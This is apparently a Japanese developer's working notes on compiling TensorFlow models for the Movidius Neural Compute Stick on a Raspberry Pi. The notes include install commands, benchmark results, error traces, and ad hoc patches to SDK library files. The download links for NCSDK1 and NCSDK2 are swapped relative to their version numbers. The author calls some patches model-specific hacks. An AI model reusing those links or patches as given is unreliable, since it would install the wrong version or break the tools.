なんか,SDK1だと16bit floatしか使えないのに対してSDK2だと32bit float使えるらしい(?)
Movidius NCSDKをTensorFlowから使う方法
- TensorFlowでプログラムを書く。
- モデルを保存する。
- TensorFlowからモデルを開いて編集をして、もう一度保存する。
- 保存したモデルをMovidius用のgraphにコンパイルする。
- graphをMovidiusに転送して実行する。
NCSCKのインストール
詳しくは https://movidius.github.io/ncsdk/install.html
Raspberry Pi 3で行う場合にはそれぞれ4時間程度かかる。
NCSDK1
wget https://ncs-forum-uploads.s3.amazonaws.com/ncsdk/ncsdk-02_05_00_02-full/ncsdk-2.05.00.02.tar.gz
NCSDK2
wget https://ncs-forum-uploads.s3.amazonaws.com/ncsdk/ncsdk-01_12_00_01-full/ncsdk-1.12.00.01.tar.gz
共通
tar xvf ncsdk-* cd ncsdk-* make install make examples
Exampleの実行 (v1, v2)
ncsdk-*/examples/tensorflow/inception_v3
にInception-V3のExampleがある。
ファイル構成
Makefile inception-v3.py run.py categories.txt inputsize.txt
動作
make
でinception-v3.pyとmvNCCompileが呼び出される。
inception-v3.py
は学習済みのInception-V3モデルのダウンロード、ckpt.meta
ファイルの保存を行う。
モデルはtensorflow.contrib.slim.nets
からダウンロードされる。
mvNCCompile
はckpt.metaからgraph
ファイルを作り出す。
make run
でrun.pyが呼び出される。
run.pyではgraphファイルをMovius上にロードして一枚の画像の推論を行い、結果を出力する。
動作結果
Number of categories: 1001 Start download to NCS... ******************************************************************************* inception-v3 on NCS ******************************************************************************* 547 electric guitar 0.9883 403 acoustic guitar 0.00772 715 pick, plectrum, plectron 0.001509 421 banjo 0.000926 820 stage 0.0006595 ******************************************************************************* Finished
V1のAPIでもV2のAPIでも正しく動作し、electric guitarの出力が得られた。
. Movidiusなし [10.55, 2.15, 2.16, 2.10, 3.90, 2.12, n/a, n/a, n/a, n/a] (10回実施、単位は秒) RAM使用率 90%程度 CPU使用率 90%程度 predictを実行するとdmesgにUnder-voltage detected!と表示されることがある。表示された場合にはpredictにかかる時間が長くなる。 複数回続けて実行すると電力不足のためかシステムが落ちる。(今回の結果では7回目以降) 2. Movidiusあり [0.62, 0.59, 0.60, 0.61, 0.61, 0.61, 0.61, 0.61, 0.61, 0.61] (10回実施、単位は秒) RAM使用率 10%程度 CPU使用率 5%程度
任意のTensorFlowモデルのコンパイル (自作モデルのコンパイル)
学習
自作のTensorFlowモデルをMovidius用にコンパイルするためには、ソースコードの編集を行いMovidius用にする必要がある。
1. 入力のPlaceholderに名前を付ける
2. tf.train.Saver()
を使って学習済みネットワークを保存する
これによって、
****.index ****.data-00000-of-00001 ****.meta
の3つのファイルが生成される。
コンパイル可能なファイルに変換
次に、生成された学習済みモデルをもう一度開いてMovidiusでコンパイルが可能なモデルを出力する。 修正点は次の通り 1. 出力の活性化関数に名前を付ける 2. 入力以外のPlaceholderをすべて削除する 3. dropoutを削除する 4. 学習用データの読み込みを削除する 5. loss, training, accuracyなど学習用のコードを削除する
こられの変更をしたコードで、保存したモデルをrestore
で開き、またsave
する。
これによって、
****_inference.index ****_inference.data-00000-of-00001 ****_inference.meta
の3つのファイルが生成される。
コンパイル
mvNCCompile
コマンドを使って保存した****.meta
ファイルをgraph
ファイルに変換する。
mvNCCompile ****_inference.meta -s 12 -in input -on output -o ****_inference.graph
この時、input
とoutput
にはそれぞれ指定したinput nodeとoutput nodeの名前を入れる。
実行結果
TensorflowのExampleにあるdeep_mnist.pyを試した。
tokunn@tokunn-VirtualBox 11:31:44 [~/Documents/MovidiusTensorflow/mnist] $ mvNCCompile mnist_inference.meta -s 12 -in input -on output -o mnist_inference.graph mvNCCompile v02.00, Copyright @ Movidius Ltd 2016 /usr/local/lib/python3.5/dist-packages/tensorflow/python/framework/ops.py:766: DeprecationWarning: builtin type EagerTensor has no __module__ attribute EagerTensor = c_api.TFE_Py_InitEagerTensor(_EagerTensorBase) /usr/local/lib/python3.5/dist-packages/tensorflow/python/util/tf_inspect.py:45: DeprecationWarning: inspect.getargspec() is deprecated, use inspect.signature() instead if d.decorator_argspec is not None), _inspect.getargspec(target)) Traceback (most recent call last): File "/usr/local/bin/mvNCCompile", line 118, in <module> create_graph(args.network, args.inputnode, args.outputnode, args.outfile, args.nshaves, args.inputsize, args.weights) File "/usr/local/bin/mvNCCompile", line 104, in create_graph net = parse_tensor(args, myriad_config) File "/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py", line 293, in parse_tensor if have_first_input(strip_tensor_id(node.outputs[0].name)): IndexError: list index out of range
ファイル変換までは問題なく動くが、コンパイル時にmvNCCompile内でIndexErrorを起こして止まってしまう。 配列の要素を確認せずにアクセスしていることが原因。
ライブラリの書き換え
/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py
を編集して、回避する。
やってよいのかどうかは不明。
< if have_first_input(strip_tensor_id(node.outputs[0].name)): --- > # ******* EDIT ****** > print(len(node.outputs)) > if len(node.outputs) and have_first_input(strip_tensor_id(node.outputs[0].name)):
これによってmvNCCompileは通って、graphファイルも生成されるようになった。
tokunn@tokunn-VirtualBox 11:36:34 [~/Documents/MovidiusTensorflow/mnist] $ mvNCCompile mnist_inference.meta -s 12 -in input -on output -o mnist_inference.graph mvNCCompile v02.00, Copyright @ Movidius Ltd 2016 /usr/local/lib/python3.5/dist-packages/tensorflow/python/framework/ops.py:766: DeprecationWarning: builtin type EagerTensor has no __module__ attribute EagerTensor = c_api.TFE_Py_InitEagerTensor(_EagerTensorBase) /usr/local/lib/python3.5/dist-packages/tensorflow/python/util/tf_inspect.py:45: DeprecationWarning: inspect.getargspec() is deprecated, use inspect.signature() instead if d.decorator_argspec is not None), _inspect.getargspec(target)) 1 1 1 1 0 1 /usr/local/bin/ncsdk/Controllers/FileIO.py:52: UserWarning: You are using a large type. Consider reducing your data sizes for best performance "Consider reducing your data sizes for best performance\033[0m")
Movidiusで動作確認 (v1)
実際にどうさせてみる。 以下、特筆なしの場合、APIはv1を使用。
pi@raspberrypi:~/week2/workspace $ python3 prediction_byMovidius4mvncV1.py Start prediting ... 2 2 8 2 2 2 2 2 2 2 2 2 8 2 2 2 2 2 2 0 2 2 2 2 2 2 8 8 2 2 0 2 2 2 2 2 2 2 2 2 2 0 2 2 2 2 2 2 2 2 2 0 8 2 2 2 2 2 2 2 0 2 2 2 2 2 2 8 8 0 2 0 2 2 2 2 2 8 2 0 2 2 2 2 2 2 2 2 0 0 2 2 8 2 2 2 2 2 2 0 8 2 2 2 2 2 2 2 2 2 2 2 2 0 2 2 8 2 2 2 2 2 0 2 2 2 2 8 2 2 2 2 2 2 2 2 2 2 2 0 2 2 2 2 8 2 2 2 0 2 2 2 8 8 2 2 2 2 2 2 2 2 2 2 2 2 8 2 2 2 8 2 2 2 2 8 2 2 2 2 2 2 2 8 2 0 2 2 2 0 2 2 8 2 2 2 0 2 0 8 2 2 2 2 2 2 2 8 2 2 2 8 2 8 2 2 2 2 2 2 8 2 2 2 8 2 2 8 8 2 2 2 0 2 2 2 0 0 2 2 2 2 2 8 2 0 2 2 8 2 2 8 2 2 2 2 2 0 2 2 8 2 2 2 2 2 2 0 8 0 2 2 0 2 0 8 0 2 2 2 2 2 2 0 8 2 2 0 2 2 2 2 2 0 2 2 2 2 2 2 2 0 2 0 2 2 2 8 2 2 2 2 2 2 2 0 2 2 0 2 2 8 2 2 8 2 2 0 2 0 2 0 2 2 2 0 2 0 2 2 8 2 2 2 0 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 8 2 2 2 8 2 2 2 2 0 2 2 2 8 2 2 0 2 2 2 2 2 0 2 2 2 2 2 2 0 8 2 2 2 8 2 0 2 2 2 2 2 2 2 0 2 2 2 2 2 2 2 2 2 2 8 2 2 2 2 8 2 2 2 2 2 2 0 0 2 2 2 2 2 0 8 2 2 2 2 2 2 2 2 2 2 2 8 2 2 2 2 8 2 8 2 2 0 2 2 2 2 2 2 2 0 2 2 2 2 0 2 2 2 2 8 2 8 2 2 2 2 2 2 2 2 8 2 2 2 2 8 2 2 2 2 2 2 2 Time : 4.403196096420288 (500 images)
正しくない結果が出力された。
1~9までの9枚で確認する。
pi@raspberrypi:~/week2/workspace $ vim prediction_byMovidius4mvncV1.py pi@raspberrypi:~/week2/workspace $ python3 prediction_byMovidius4mvncV1.py ../../JPEGImages/pickup/00628.jpg ../../JPEGImages/pickup/00042.jpg ../../JPEGImages/pickup/00025.jpg ../../JPEGImages/pickup/00652.jpg ../../JPEGImages/pickup/00013.jpg ../../JPEGImages/pickup/00520.jpg ../../JPEGImages/pickup/00663.jpg ../../JPEGImages/pickup/00683.jpg ../../JPEGImages/pickup/00433.jpg Start prediting ... [0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] [0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] [0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] [0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] [0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] [0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] [0. 0. 0. 0. 0. 0. 0. 0. 1. 0.] [0. 0. 0. 0. 0. 0. 0. 0. 1. 0.] [0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] Time : 0.11402153968811035 (9 images)
なぜか4と7が100%"8"だと認識されて、それ以外は100%"2"だと認識される。 逆順に入れてみる。
pi@raspberrypi:~/week2/workspace $ vim prediction_byMovidius4mvncV1.py pi@raspberrypi:~/week2/workspace $ python3 prediction_byMovidius4mvncV1.py ../../JPEGImages/pickup/00433.jpg ../../JPEGImages/pickup/00683.jpg ../../JPEGImages/pickup/00663.jpg ../../JPEGImages/pickup/00520.jpg ../../JPEGImages/pickup/00013.jpg ../../JPEGImages/pickup/00652.jpg ../../JPEGImages/pickup/00025.jpg ../../JPEGImages/pickup/00042.jpg ../../JPEGImages/pickup/00628.jpg Start prediting ... [0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] [0. 0. 0. 0. 0. 0. 0. 0. 1. 0.] [0. 0. 0. 0. 0. 0. 0. 0. 1. 0.] [0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] [0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] [0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] [0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] [0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] [0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] Time : 0.11403870582580566 (9 images)
やはり4と7が100%"8"だと認識されて、それ以外は100%"2"。
もう一度最初から
学習
deepmnist.pyをjupyter-notebookで実行。
saving graph to: /tmp/tmpc_vjn3sg step 0, training accuracy 0.08 step 10, training accuracy 0.4 step 20, training accuracy 0.46 (略) step 470, training accuracy 0.96 step 480, training accuracy 0.92 step 490, training accuracy 0.96 test accuracy 0.939
Test Accuracyは0.939で正しく学習できている。
出力ファイルが正しく保存されていることを確認。
tokunn@tokunn-VirtualBox 13:49:04 [~/Documents/MovidiusTensorflow/mnist0911] $ ls -1 MNIST_data/ checkpoint conv4movidius.ipynb deepmnist.ipynb mnist_model.data-00000-of-00001 mnist_model.index mnist_model.meta output/
さらに、Movidius用に保存しなおし。
tokunn@tokunn-VirtualBox 13:51:43 [~/Documents/MovidiusTensorflow/mnist0911] $ ls -1 MNIST_data/ checkpoint conv4movidius.ipynb deepmnist.ipynb mnist_inference.data-00000-of-00001 mnist_inference.index mnist_inference.meta mnist_model.data-00000-of-00001 mnist_model.index mnist_model.meta output/
コンパイルを実行。
mvNCCompile mnist_inference.meta -s 12 -in input -on output -o mnist_inference.graph
RPIでMovidiusでpredictしてみる。
pi@raspberrypi:~/week2/mnist0911 $ python3 prediction_byMovidius4mvncV1.py ../../JPEGImages/pickup/00433.jpg ../../JPEGImages/pickup/00683.jpg ../../JPEGImages/pickup/00663.jpg ../../JPEGImages/pickup/00520.jpg ../../JPEGImages/pickup/00013.jpg ../../JPEGImages/pickup/00652.jpg ../../JPEGImages/pickup/00025.jpg ../../JPEGImages/pickup/00042.jpg ../../JPEGImages/pickup/00628.jpg Start prediting ... [0. 0. 0. 0. 0. 0. 0. 0. 1. 0.] [0. 0. 0. 0. 0. 0. 0. 0. 1. 0.] [0. 0. 0. 0. 0. 0. 0. 0. 1. 0.] [0. 0. 0. 1. 0. 0. 0. 0. 0. 0.] [0. 0. 0. 1. 0. 0. 0. 0. 0. 0.] [0. 0. 0. 0. 0. 0. 0. 0. 1. 0.] [0. 0. 0. 0. 0. 0. 0. 0. 1. 0.] [0. 0. 0. 0. 0. 0. 0. 0. 1. 0.] [0. 0. 0. 0. 0. 0. 0. 0. 1. 0.] Time : 0.1024773120880127 (10 images)
やはり変わらず。
RPI3じゃなくて実マシンでやってみる
Rspberry Piが悪いかもしれないから、実際のLinuxマシン(Ubuntu 16.04 - nanase)でやってみる。
tokunn@nanase 7:11:40 [~/Documents/week2/0911] $ python3 prediction_byMovidius4mvncV1.py ERROR 1: libgrass_vector.7.4.0.so: cannot open shared object file: No such file or directory ERROR 1: libgrass_vector.7.4.0.so: cannot open shared object file: No such file or directory ERROR 1: libgrass_dgl.7.4.0.so: cannot open shared object file: No such file or directory ERROR 1: libgrass_dgl.7.4.0.so: cannot open shared object file: No such file or directory Image path : ./JPEGImages/*.jpg Start prediting ... [ 0. 0. 0. 0. 0. 1. 0. 0. 0. 0.] [ 1. 0. 0. 0. 0. 0. 0. 0. 0. 0.] [ 0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] [ 0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] [ 0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] [ 0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] [ 0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] [ 3.35454941e-04 0.00000000e+00 0.00000000e+00 0.00000000e+00 1.00000000e+00 0.00000000e+00 0.00000000e+00 0.00000000e+00 0.00000000e+00 0.00000000e+00] [ 0. 0. 0. 0. 0. 1. 0. 0. 0. 0.] [ 0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] Time : 0.0796973705291748 (10 images)
やっぱり何かおかしい。
Rspberry Piだから起きている訳ではない。
おそらく問題はmvNCCompileで生成されたgraphファイルなのでは?
Tensorflowで保存したファイルが正しいかを確認する。
jupyter-notebook上で、mnist_modelからrestoreしてpredictさせてみる。
INFO:tensorflow:Restoring parameters from ./output/mnist_model test accuracy 0.9477
問題なくpredictできている。
mvNCCompileに入れているファイルが正しいかどうかを確認する
これが正しく動いていれば、問題はmvNCCompile。
もしくは突っ込んだファイルがダメか。
jupyter-notebook上で、mnist_inferenceからrestoreしてpredictさせてみる。
INFO:tensorflow:Restoring parameters from ./output/mnist_inference test accuracy 0.9477
こちらも問題なくpredictできている。 ---> 問題はmvNCCompile周辺
mvNCCheckでモデルの確認をしてみる
mvNCCheckを使って、モデルの確認を行う。
tokunn@nanase 8:20:05 [~/Documents/week2/0911/output] $ mvNCCheck mnist_inference.meta -s 12 -in input -on output -of mnist_inference.graph mvNCCheck v02.00, Copyright @ Movidius Ltd 2016 USB: Transferring Data... USB: Myriad Execution Finished USB: Myriad Connection Closing. USB: Myriad Connection Closed. Result: (1, 1, 10) 1) 8 0.69141 2) 2 0.10852 3) 4 0.075806 4) 3 0.047607 5) 5 0.028824 Expected: (1, 10) 1) 8 0.685481 2) 2 0.111384 3) 4 0.078136 4) 3 0.0483064 5) 5 0.0283811 ------------------------------------------------------------ Obtained values ------------------------------------------------------------ Obtained Min Pixel Accuracy: 0.8644439280033112% (max allowed=2%), Pass Obtained Average Pixel Accuracy: 0.19093991722911596% (max allowed=1%), Pass Obtained Percentage of wrong values: 0.0% (max allowed=0%), Pass Obtained Pixel-wise L2 error: 0.325355674229958% (max allowed=1%), Pass Obtained Global Sum Difference: 0.013088561594486237 ------------------------------------------------------------
Result(Movidiusの出力)とExpected(TensorFlowの出力)がほぼ同じであることから、正しく動作していると考えられる。
ということは、問題なのは推論に使っているNCAPIのほう?
mvNCCheckを使って認識してみる
mvNCCheckに-iオプションを付けることで自分で画像ファイルを指定して入力することができる。
tokunn@nanase 8:58:09 [~/Documents/week2/0911/output] $ mvNCCheck mnist_inference.meta -s 12 -in input -on output -of mnist_inference.graph -i ../JPEGImages/pickup/00013.jpg mvNCCheck v02.00, Copyright @ Movidius Ltd 2016 Traceback (most recent call last): File "/usr/local/bin/mvNCCheck", line 152, in <module> quit_code = check_net(args.network, args.image, args.inputnode, args.outputnode, args.nshaves, args.inputsize, args.weights, args) File "/usr/local/bin/mvNCCheck", line 130, in check_net net = parse_tensor(args, myriad_config, file_gen=True) File "/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py", line 266, in parse_tensor int(shape[3]), IndexError: list index out of range
ライブラリ内の/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py
でまたIndexError: list index out of range
が発生。
いい加減TensorFlowParserはリストにアクセスする前に要素数をチェックしていただきたい。
とりあえず204行目のdebug=Trueを有効化して、shapeを表示つするように追記。
204c204 < # debug = True --- > debug = True 263a264 > print("Input image shape", shape)
これを実行して、
tokunn@nanase 9:25:28 [~/Documents/week2/0911/output] $ mvNCCheck mnist_inference.meta -s 12 -in input -on output -of mnist_inference.graph -i ../JPEGImages/pickup/00013.jpg mvNCCheck v02.00, Copyright @ Movidius Ltd 2016 Input image shape [1, 784] Traceback (most recent call last): File "/usr/local/bin/mvNCCheck", line 152, in <module> quit_code = check_net(args.network, args.image, args.inputnode, args.outputnode, args.nshaves, args.inputsize, args.weights, args) File "/usr/local/bin/mvNCCheck", line 130, in check_net net = parse_tensor(args, myriad_config, file_gen=True) File "/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py", line 267, in parse_tensor int(shape[3]), IndexError: list index out of range
の結果を得る。
Input shapeは[1, 784]であることがわかる。
-i [画像]のオプションなしで実行すると、
tokunn@nanase 9:26:30 [~/Documents/week2/0911/output] $ mvNCCheck mnist_inference.meta -s 12 -in input -on output -of mnist_inference.graph mvNCCheck v02.00, Copyright @ Movidius Ltd 2016 Input image shape [1, 784] 0 Const Const OUT: Const:0 /usr/local/bin/ncsdk/Controllers/TensorFlowParser.py line no.290 1 VariableV2 Variable OUT: Variable:0 (略) BiasAdd 75 Softmax output IN: fc2/add:0 OUT: output:0 Softmax (略) Result: (1, 1, 10) 1) 8 0.32178 2) 4 0.22034 3) 2 0.14233 4) 0 0.10773 5) 3 0.1059 (略)
のように正しく実行される。
Input shapeは[1, 784]で、エラーが起きたときと同じである。
あれ、なんでこれCNNなのに1次元([1,784]の2次元)で入力してるんだこれ?
[1,28,28]じゃないのかな
-> ちゃんと入力してからreshapeして28x28にしてた。
こちらとしては2次元([1, 784])で入力したいが、TensorFlowParserは最低でも4次元はないとお気に召さないらしい。
でも、内部で乱数生成しているときには何にも起きないのなんで?
とりあえず、問題のparse_img()の定義を探してみる。
tokunn@nanase 9:55:12 [/opt/movidius/NCSDK/ncsdk-x86_64/tk/Models] $ find / -type f 2>/dev/null | grep .py | xargs grep parse_img 2>/dev/null /usr/local/bin/ncsdk/Controllers/MiscIO.py:def parse_img(path, new_size, raw_scale=1, mean=None, channel_swap=None): /opt/movidius/NCSDK/ncsdk-armv7l/tk/Controllers/MiscIO.py:def parse_img(path, new_size, raw_scale=1, mean=None, channel_swap=None): /opt/movidius/NCSDK/ncsdk-x86_64/tk/Controllers/MiscIO.py:def parse_img(path, new_size, raw_scale=1, mean=None, channel_swap=None):
/usr/local/bin/ncsdk/Controllers/MiscIO.py
にあるらしい。
# 定義 227 def parse_img(path, new_size, raw_scale=1, mean=None, channel_swap=None): 228 """ 229 Parse an image with the Python Imaging Libary and convert to 4D numpy array 234 """
確かにあった。
ちなみに呼び出しは、
/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py
# 呼び出し 266: input_data = parse_img(image, 267- [int(shape[0]), 268- int(shape[3]), 269- int(shape[1]), 270- int(shape[2])], 271- raw_scale=arguments.raw_scale, 272- mean=arguments.mean, 273- channel_swap=arguments.channel_swap)
となっている。
呼び出しの変数をどうしたらいいのか知りたいので、parse_img()を追いかける。
/usr/local/bin/ncsdk/Controllers/MiscIO.py
248 if path.split(".")[-1].lower() in ["png", "jpeg", "jpg", "bmp", "gif"]: 250 greyscale = True if new_size[2] == 1 else False
どうやらnew_size[2]
(配列の3番目)はカラーチャンネルを確かめているらしい。
というわけでint(shape[1])
は今回は1となる。
第一引数のpath(呼び出し側ではimage)は画像ファイルへのパスを表している。
279 if (len(data.shape) == 2): 280 # Add axis for greyscale images (size 1) 281 data = data[:, :, np.newaxis] 282 283 data = skimage.transform.resize(data, new_size[2:]) 284 data = np.transpose(data, (2, 0, 1)) 285 data = np.reshape(data, (1, data.shape[0], data.shape[1], data.shape[2])) 286 287 data *= raw_scale
まず、grayscaleの場合にはshapeが(x, y)のみなので、1次元追加することで3次元としている。
これでshapeは(x, y, カラーチャンネル数)となる。
次にresizeの指定にnew_size[2]
とnew_size[3]
を使っている。
呼び出し側で、int(shape[1])
とint(shape[2])
となるわけだが、int(shape[1])
はグレースケールか否かを表しているのでは?
newsizeが使われているのはこの2か所のみ。
どういうこったい
次に、(x, y, カラーチャンネル数)を(カラーチャンネル数, x, y)になるように軸を入れ替えする。
ちなみに、正しく動作しているランダム値の時のinput_data
(TensorFlowParser内)は、
259 input_data = np.random.uniform(0, 1, shape)
となっているから、最終的にはinput_data
のshapeは(1,784)のもとの形となるべき。
これらの情報から引数の予想を立てる。
まず、new_image以外に入るべき値はそのままでよい。
次に、new_imageに入れるべきshapeについてであるが、通常は画像は(枚数, x, y, カラーチャンネル数)
のようになっているであろうと想像がつく。
これを呼び出し側では[枚数, カラーチャンネル数, x, y]
の形にして入力している。
よって、入力は[1, 1, shape[0], shape[1]]
となる。
/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py
268,271c268,271 < [int(shape[0]), < int(shape[3]), < int(shape[1]), < int(shape[2])], --- > [int(1), > int(1), > int(shape[0]), > int(shape[1])],
ただし、このままでは
250 greyscale = True if new_size[2] == 1 else False
の時にxの値を見てgreyscaleを判断してしまう。
なので、new_size[2]
ではなく、new_size[1]
書き換える。誤植?
/usr/local/bin/ncsdk/Controllers/MiscIO.py
250c250 < greyscale = True if new_size[2] == 1 else False --- > greyscale = True if new_size[1] == 1 else False
このパッチを当てて実行すると、
tokunn@nanase 11:16:22 [~/Documents/week2/0911/output] $ mvNCCheck mnist_inference.meta -s 12 -in input -on output -of mnist_inference.graph -i ../JPEGImages/pickup/00013.jpg mvNCCheck v02.00, Copyright @ Movidius Ltd 2016 Input image shape [1, 784] image path ../JPEGImages/pickup/00013.jpg /usr/local/lib/python3.6/dist-packages/skimage/transform/_warps.py:84: UserWarning: The default mode, 'constant', will be changed to 'reflect' in skimage 0.15. warn("The default mode, 'constant', will be changed to 'reflect' in " Traceback (most recent call last): File "/usr/local/bin/mvNCCheck", line 152, in <module> quit_code = check_net(args.network, args.image, args.inputnode, args.outputnode, args.nshaves, args.inputsize, args.weights, args) File "/usr/local/bin/mvNCCheck", line 130, in check_net net = parse_tensor(args, myriad_config, file_gen=True) File "/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py", line 274, in parse_tensor channel_swap=arguments.channel_swap) File "/usr/local/bin/ncsdk/Controllers/MiscIO.py", line 290, in parse_img data[0] = data[0][np.argsort(channel_swap), :, :] IndexError: index 2 is out of bounds for axis 0 with size 1
と新しいエラーが出る。
なので、とりあえずパッチを当てる。
/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py
272,274c272,274 < raw_scale=arguments.raw_scale, < mean=arguments.mean, < channel_swap=arguments.channel_swap) --- > raw_scale=1, > mean=None, > channel_swap=None)
これで実行すると、
tokunn@nanase 11:41:03 [~/Documents/week2/0911/output] $ mvNCCheck mnist_inference.meta -s 12 -in input -on output -of mnist_inference.graph -i ../JPEGImages/pickup/00013.jpg mvNCCheck v02.00, Copyright @ Movidius Ltd 2016 input_data shape (1, 1, 1, 784) Traceback (most recent call last): File "/usr/local/bin/mvNCCheck", line 152, in <module> quit_code = check_net(args.network, args.image, args.inputnode, args.outputnode, args.nshaves, args.inputsize, args.weights, args) File "/usr/local/bin/mvNCCheck", line 130, in check_net net = parse_tensor(args, myriad_config, file_gen=True) File "/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py", line 281, in parse_tensor res = outputTensor.eval(feed_dict={inputnode + ':0' : input_data}) File "/usr/local/lib/python3.6/dist-packages/tensorflow/python/framework/ops.py", line 570, in eval return _eval_using_default_session(self, feed_dict, self.graph, session) File "/usr/local/lib/python3.6/dist-packages/tensorflow/python/framework/ops.py", line 4455, in _eval_using_default_session return session.run(tensors, feed_dict) File "/usr/local/lib/python3.6/dist-packages/tensorflow/python/client/session.py", line 889, in run run_metadata_ptr) File "/usr/local/lib/python3.6/dist-packages/tensorflow/python/client/session.py", line 1096, in _run % (np_val.shape, subfeed_t.name, str(subfeed_t.get_shape()))) ValueError: Cannot feed value of shape (1, 1, 784, 1) for Tensor 'input:0', which has shape '(1, 784)'
とエラーが出る。
終わりがない。
これやる意味あるのか?
別にmvNCCheckで画像を与えなくてもよくない?
PythonでのAPI追いかけるべきでは?
mvNCCheckのランダムでgraphは正しいと思ったけど、そもそも出力されたグラフがおかしかったら、tensorflowでやったやつもおかしな結果を出力するのでは
DAY2
やっぱり4次元にしたところで入力は2次元なので入力できない。
さらに、雑なパッチを当てる。
これでほかの画像は入力できないし、ほかのネットワークにも対応できない。
/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py
204c204 < debug = True --- > # debug = True 277a278 > input_data = input_data.transpose([0, 1, 3, 2])[0][0] 279a281 > #print(input_data) 297d298 < print("/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py line no.290")
実行してみる。
tokunn@nanase 23:49:44 [~/Documents/week2/0912/output] $ for i in $(ls ../JPEGImages/pickup/); do echo $i; mvNCCheck mnist_inference.meta -s 12 -in input -on output -of mnist_inference.graph -i ../JPEGImages/pickup/$i 2>/dev/null; done 1.jpg Result: (1, 1, 10) 1) 2 0.28613 Expected: (1, 10) 1) 2 0.281931 ------------------------------------------------------------ 2.jpg Result: (1, 1, 10) 1) 2 0.81348 Expected: (1, 10) 1) 2 0.81391 ------------------------------------------------------------ 3.jpg Result: (1, 1, 10) 1) 2 0.87158 Expected: (1, 10) 1) 2 0.870968 ------------------------------------------------------------ 4.jpg Result: (1, 1, 10) 1) 3 0.39771 Expected: (1, 10) 1) 3 0.40986 ------------------------------------------------------------ 5.jpg Result: (1, 1, 10) 1) 2 0.70898 Expected: (1, 10) 1) 2 0.712083 ------------------------------------------------------------ 6.jpg Result: (1, 1, 10) 1) 5 0.77686 Expected: (1, 10) 1) 5 0.773194 ------------------------------------------------------------ 7.jpg Result: (1, 1, 10) 1) 5 0.49268 Expected: (1, 10) 1) 5 0.499106 ------------------------------------------------------------ 8.jpg Result: (1, 1, 10) 1) 2 0.95605 Expected: (1, 10) 1) 2 0.955554 ------------------------------------------------------------ 9.jpg Result: (1, 1, 10) 1) 2 0.50293 Expected: (1, 10) 1) 2 0.494139 ------------------------------------------------------------
やっぱりほとんどの数字が2だと出力される。
ただし、mvNCCheckからの場合には確率は100%ではない。
PythonAPIから呼び出しても、mvNCCheckから呼び出しても同じ結果が返ってくる。
ということは変換したgraphファイルがおかしいということがわかる。
mvNCCompileに渡したファイルか、mvNCCompileのどちらかが間違えている。
deep_mnistのサンプルをgithub上のコードでやってみる
deep_mnistのサンプルがgithub上にあった。 https://github.com/ashwinvijayakumar/ncappzoo/tree/mnist/tensorflow/mnist
動く。
mvNCCompileのパッチを元に戻しても大丈夫。
自分で用意したgraphとJPEGにしても動く。
あれ
これは、私がAPIを正しく使えていないのでは?
(もちろんmvNCCheck -i のほうはIndexError)
ただ、Intelのサンプルは確実に間違えていた。
原因
- 黒地に白字で学習させてたのに、推論の時に白地に黒字の画像でやっていた
- 画像を読み込んだ後に255で割るのを忘れていた
- mvNCCheckに画像を読み込ませる機能は動かない
ずっと、おかしな出力だと思っていたものは正しい出力であった。
結論 (動作した方法・ソースコード)
3つの問題を解決することができた。
1. TensorFlowのモデルをmvNCCompileでコンパイルできない
-> TensorFlowParser.pyの書き換え
2. mvNCCheckに-iオプションで画像を読み込ませることができるらしいが、動かない
-> TensorFlowParser.pyとMiscIO.pyをモデルに合わせて書き換え(汎用性なし)
3. 推論の結果がおかしい
-> 入力がおかしい
mvNCCompileの書き換え
/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py
の290行目付近を編集して、配列の要素を確認してからアクセスるようにする。
< if have_first_input(strip_tensor_id(node.outputs[0].name)): --- > if len(node.outputs) and have_first_input(strip_tensor_id(node.outputs[0].name)):
これで、mvNCCompileは通るようになる。
mvNCCheckの書き換え
/usr/local/bin/ncsdk/Controllers/MiscIO.py
の250行目付近を編集。
250c250 < greyscale = True if new_size[2] == 1 else False --- > greyscale = True if new_size[1] == 1 else False
/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py
の270行目付近を編集。
265,271c265,271 < [int(shape[0]), < int(shape[3]), < int(shape[1]), < int(shape[2])], < raw_scale=arguments.raw_scale, < mean=arguments.mean, < channel_swap=arguments.channel_swap) --- > [int(1), > int(1), > int(shape[0]), > int(shape[1])], > raw_scale=1, > mean=None, > channel_swap=None) 272a273 > input_data = input_data.transpose([0, 1, 3, 2])[0][0]
これで
mvNCCheck mnist_inference.meta -s 12 -in input -on output -of mnist_inference.graph -i ../github_deep_mnist/ncappzoo/data/digit_images/one.png -S 255
で動き出す。ただし結果は?。入力する画像を加工すべき?
メインプログラム(学習用)
